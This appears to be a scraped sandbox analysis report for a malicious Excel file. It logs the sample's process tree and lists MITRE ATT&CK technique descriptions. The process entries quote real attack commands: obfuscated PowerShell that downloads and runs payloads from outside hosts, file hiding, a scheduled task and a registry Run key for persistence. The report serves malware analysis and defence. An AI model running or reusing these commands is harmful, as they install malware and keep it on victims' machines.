Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: attrib.exe PID: 2972 Parent PID: 2880

General

Start time:	19:14:53
Start date:	04/01/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\attrib.exe' +s +h pd.bat
Imagebase:	0xff7c0000
File size:	18432 bytes
MD5 hash:	C65C20C89A255517F11DD18B056CADB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 1688 Parent PID: 960

General

Start time:	19:15:00
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: mode.com PID: 3012 Parent PID: 1688

General

Start time:	19:15:00
Start date:	04/01/2021
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 18,1
Imagebase:	0xffe90000
File size:	30208 bytes
MD5 hash:	718E86CB060170430D4EF70EE39F93D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 1544 Parent PID: 1688

General

Start time:	19:15:00
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ver
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 620 Parent PID: 1688

General

Start time:	19:15:01
Start date:	04/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Imagebase:	0x4aaa0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 2264 Parent PID: 620

General

Start time:	19:15:01
Start date:	04/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Imagebase:	0x13fa60000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: ps.exe PID: 2364 Parent PID: 2264

General

Start time:	19:15:06
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Local\Temp\ps.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ps.exe'
Imagebase:	0xe70000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: schtasks.exe PID: 2940 Parent PID: 2364

General

Start time:	19:15:10
Start date:	04/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Imagebase:	0x110000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ps.exe PID: 2932 Parent PID: 2364

General

Start time:	19:15:11
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Local\Temp\ps.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ps.exe
Imagebase:	0xe70000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 1840 Parent PID: 2932

General

Start time:	19:15:13
Start date:	04/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x4a9e0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 3016 Parent PID: 1840

General

Start time:	19:15:13
Start date:	04/01/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x760000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 2528 Parent PID: 2932

General

Start time:	19:15:15
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\svchost.exe'
Imagebase:	0x230000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: schtasks.exe PID: 3052 Parent PID: 2528

General

Start time:	19:15:20
Start date:	04/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Imagebase:	0x610000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 2184 Parent PID: 2528

General

Start time:	19:15:21
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x230000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 2464 Parent PID: 2528

General

Start time:	19:15:22
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x230000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 2800 Parent PID: 1388

General

Start time:	19:15:25
Start date:	04/01/2021
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\svchost.exe'
Imagebase:	0x230000
File size:	1163264 bytes
MD5 hash:	128409D5CB9701CD12600BAF7A623794
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 158653

General

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre